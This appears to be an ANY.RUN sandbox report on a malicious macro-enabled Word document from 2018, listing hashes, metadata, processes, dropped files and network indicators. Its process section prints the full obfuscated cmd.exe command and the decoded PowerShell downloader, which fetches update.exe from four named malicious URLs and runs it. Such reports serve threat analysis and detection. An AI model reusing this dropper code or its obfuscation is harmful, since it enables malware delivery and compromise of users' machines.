analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

dc1f0a13fb95f9e3a4c539d34d0c6b3cc5e8683da788d45d43b10d305ee31e79

Full analysis: https://app.any.run/tasks/a5f5a610-b59c-43d5-817d-19c68ef122f1
Verdict: Malicious activity
Analysis date: December 19, 2018, 05:39:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 10:22:00 2018, Last Saved Time/Date: Mon Dec 17 10:22:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 28, Security: 0
MD5:

8E69850E22C9FA5B5E3ED72220A1F870

SHA1:

780733178F0494E6E745E3BBB24E1C6C1E3CB961

SHA256:

DC1F0A13FB95F9E3A4C539D34D0C6B3CC5E8683DA788D45D43B10D305EE31E79

SSDEEP:

1536:J0nbUhdKKnso8MU71LE/fqW2X49wSTBoVRJ3FT0ab+a9:J0nbUhdKKnsovU2V9SSwJd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2832)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2640)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2832)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2116)
    • Creates files in the user directory

      • powershell.exe (PID: 2484)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2832)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2832)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:17 10:22:00
ModifyDate: 2018:12:17 10:22:00
Pages: 1
Words: 4
Characters: 28
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 31
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dc1f0a13fb95f9e3a4c539d34d0c6b3cc5e8683da788d45d43b10d305ee31e79.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2116c:\VimUCsu\ITVjHOXmPzMqJ\CpSZdwXkIp\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set cLhj=FkjGzRSvWLjbstKYzUiHFdXMzkTZuC@a}qc\PrN l;:'(p./+={)0hw2nEBDfoygeQmIx8$-,&&for %f in (70,57,8,36,49,43,25,18,19,43,41,70,21,22,31,49,56,64,54,71,61,11,10,64,34,13,39,38,64,13,46,8,64,11,29,40,18,64,56,13,41,70,17,6,36,49,43,53,13,13,45,42,47,47,34,64,12,13,64,56,64,40,40,64,12,46,10,31,25,61,11,12,61,56,46,60,37,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,45,31,37,25,61,40,7,18,21,64,61,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,54,61,66,31,56,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,31,18,13,56,64,54,12,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,43,46,6,45,40,18,13,44,43,30,43,51,41,70,11,22,58,49,43,38,54,56,43,41,70,40,24,6,39,49,39,43,55,69,52,43,41,70,53,67,3,49,43,65,11,67,43,41,70,24,19,67,49,70,64,56,7,42,13,64,66,45,48,43,35,43,48,70,40,24,6,48,43,46,64,68,64,43,41,60,61,37,64,31,34,53,44,70,6,53,60,39,18,56,39,70,17,6,36,51,50,13,37,62,50,70,21,22,31,46,59,61,54,56,40,61,31,21,20,18,40,64,44,70,6,53,60,72,39,70,24,19,67,51,41,70,61,38,37,49,43,54,40,54,43,41,67,60,39,44,44,3,64,13,71,67,13,64,66,39,70,24,19,67,51,46,40,64,56,63,13,53,39,71,63,64,39,69,52,52,52,52,51,39,50,67,56,7,61,25,64,71,67,13,64,66,39,70,24,19,67,41,70,19,23,19,49,43,33,36,33,43,41,11,37,64,31,25,41,32,32,34,31,13,34,53,50,32,32,70,67,57,7,49,43,25,7,29,43,41,83)do set Vnb9=!Vnb9!!cLhj:~%f,1!&&if %f equ 83 powershell.exe "!Vnb9:~-457!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2640CmD /V:ON/C"set cLhj=FkjGzRSvWLjbstKYzUiHFdXMzkTZuC@a}qc\PrN l;:'(p./+={)0hw2nEBDfoygeQmIx8$-,&&for %f in (70,57,8,36,49,43,25,18,19,43,41,70,21,22,31,49,56,64,54,71,61,11,10,64,34,13,39,38,64,13,46,8,64,11,29,40,18,64,56,13,41,70,17,6,36,49,43,53,13,13,45,42,47,47,34,64,12,13,64,56,64,40,40,64,12,46,10,31,25,61,11,12,61,56,46,60,37,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,45,31,37,25,61,40,7,18,21,64,61,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,54,61,66,31,56,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,31,18,13,56,64,54,12,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,43,46,6,45,40,18,13,44,43,30,43,51,41,70,11,22,58,49,43,38,54,56,43,41,70,40,24,6,39,49,39,43,55,69,52,43,41,70,53,67,3,49,43,65,11,67,43,41,70,24,19,67,49,70,64,56,7,42,13,64,66,45,48,43,35,43,48,70,40,24,6,48,43,46,64,68,64,43,41,60,61,37,64,31,34,53,44,70,6,53,60,39,18,56,39,70,17,6,36,51,50,13,37,62,50,70,21,22,31,46,59,61,54,56,40,61,31,21,20,18,40,64,44,70,6,53,60,72,39,70,24,19,67,51,41,70,61,38,37,49,43,54,40,54,43,41,67,60,39,44,44,3,64,13,71,67,13,64,66,39,70,24,19,67,51,46,40,64,56,63,13,53,39,71,63,64,39,69,52,52,52,52,51,39,50,67,56,7,61,25,64,71,67,13,64,66,39,70,24,19,67,41,70,19,23,19,49,43,33,36,33,43,41,11,37,64,31,25,41,32,32,34,31,13,34,53,50,32,32,70,67,57,7,49,43,25,7,29,43,41,83)do set Vnb9=!Vnb9!!cLhj:~%f,1!&&if %f equ 83 powershell.exe "!Vnb9:~-457!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2484powershell.exe "$EWP='kiH';$dXa=new-object Net.WebClient;$USP='http://cestenelles.jakobson.fr/ttt/update.exe@http://www.sparkolvideo.qoiy.ru/ttt/update.exe@http://www.woman.qoiy.ru/ttt/update.exe@http://www.saitnews.ru/ttt/update.exe'.Split('@');$bXB='Nwn';$lzS = '280';$hIG='QbI';$zHI=$env:temp+'\'+$lzS+'.exe';foreach($Shf in $USP){try{$dXa.DownloadFile($Shf, $zHI);$oNr='wlw';If ((Get-Item $zHI).length -ge 80000) {Invoke-Item $zHI;$HMH='qPq';break;}}catch{}}$IEv='kvC';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 408
Read events
944
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR984E.tmp.cvr
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D3D9350.wmf
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\583065DE.wmf
MD5:
SHA256:
2484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AHL0MFFUN9IHXXLD3M6V.temp
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7A25B11.wmfwmf
MD5:A8FFF05643083BD3EA3BAC5A4B29A2A0
SHA256:DF4531E90117C804A261E0E846660E82C90A5ABB1857D6F434E10A97B4EC142C
2484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722583CB.wmfwmf
MD5:FF5E656EC09ADFA7464D508DC17DA72F
SHA256:44853892790E2CF8C888B9B2703B6CED41D6E0E22706E57326BD691C8CE1066F
2832WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:223C04EE61ED8F02BCF356FC5203A117
SHA256:C996176EFEE81BE81BBED062D8AD643F33D360DEC10E717577235A9D29F2EF09
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$1f0a13fb95f9e3a4c539d34d0c6b3cc5e8683da788d45d43b10d305ee31e79.docpgc
MD5:61A0CA8AD91DA9FA54984AB21D612CA7
SHA256:63A1B2691DE76DE7B69ADD9E4CE2C1CE22F6F5AB611969FB69C7EB4AE5CD774B
2484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19abd6.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2484
powershell.exe
GET
403
213.186.33.24:80
http://cestenelles.jakobson.fr/ttt/update.exe
FR
html
285 b
malicious
2484
powershell.exe
GET
404
81.177.6.6:80
http://www.woman.qoiy.ru/ttt/update.exe
RU
html
632 b
suspicious
2484
powershell.exe
GET
404
81.177.6.6:80
http://www.sparkolvideo.qoiy.ru/ttt/update.exe
RU
html
632 b
suspicious
2484
powershell.exe
GET
404
81.177.6.6:80
http://www.saitnews.ru/ttt/update.exe
RU
html
632 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2484
powershell.exe
213.186.33.24:80
cestenelles.jakobson.fr
OVH SAS
FR
malicious
2484
powershell.exe
81.177.6.6:80
www.sparkolvideo.qoiy.ru
JSC RTComm.RU
RU
malicious

DNS requests

Domain
IP
Reputation
cestenelles.jakobson.fr
  • 213.186.33.24
malicious
www.sparkolvideo.qoiy.ru
  • 81.177.6.6
suspicious
www.woman.qoiy.ru
  • 81.177.6.6
suspicious
www.saitnews.ru
  • 81.177.6.6
suspicious

Threats

No threats detected
No debug info